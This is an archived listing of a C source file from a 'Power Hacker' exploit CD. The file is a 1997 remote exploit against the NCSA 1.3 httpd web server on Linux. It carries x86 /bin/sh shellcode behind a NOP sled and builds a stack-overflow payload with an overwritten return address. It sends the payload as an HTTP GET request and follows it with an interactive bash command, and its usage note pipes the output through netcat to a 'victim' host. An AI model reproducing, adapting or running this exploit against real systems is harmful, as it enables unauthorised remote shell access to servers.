home *** CD-ROM | disk | FTP | other *** search
/ Power Hacker 2003 / Power_Hacker_2003.iso / Exploit and vulnerability / hoobie / linux_httpd.c < prev    next >
C/C++ Source or Header  |  2001-11-06  |  2KB  |  63 lines
  1. /*
  2.  * NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
  3.  *
  4.  * Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of ToXyn !!!
  5.  *
  6.  * usage:
  7.  *      $ (hackttpd 0; cat) | nc victim 143
  8.  *                  |
  9.  *                  +--> usually from -1000 to 1000 (try steeps of 100)
  10.  */
  11.  
  12. #include <stdio.h>
  13.  
  14. unsigned char shell[] = {
  15. '/',0x90,0x90,0x90,
  16. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  17. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  18. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  19. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  20. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  21. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  22. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  23. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  24. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  25. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  26. 0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,
  27. 0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
  28. 0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b,
  29. 0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
  30. 'b','i','n','/','s','h'
  31. };
  32.  
  33. char username[256+8];
  34.  
  35. void main(int argc, char *argv[]) {
  36.         int i,a;
  37.         long val;
  38.  
  39.         if(argc>1)
  40.                 a=atoi(argv[1]);
  41.         else
  42.                 a=0;
  43.  
  44.         strcpy(username,shell);
  45.  
  46.         for(i=strlen(shell);i<sizeof(username);i++)
  47.                 username[i]=0x90; /* NOP */
  48.  
  49.         val = 0xbfff537c + 4 + a;
  50.  
  51.         i=sizeof(username)-4;
  52.         {
  53.                 username[i+0] = val & 0x000000ff;
  54.                 username[i+1] = (val & 0x0000ff00) >> 8;
  55.                 username[i+2] = (val & 0x00ff0000) >> 16;
  56.                 username[i+3] = (val & 0xff000000) >> 24;
  57.         }
  58.  
  59.         username[ sizeof(username) ] = 0;
  60.  
  61.         printf("GET %s\n/bin/bash -i 2>&1;\n", username);
  62. }
  63.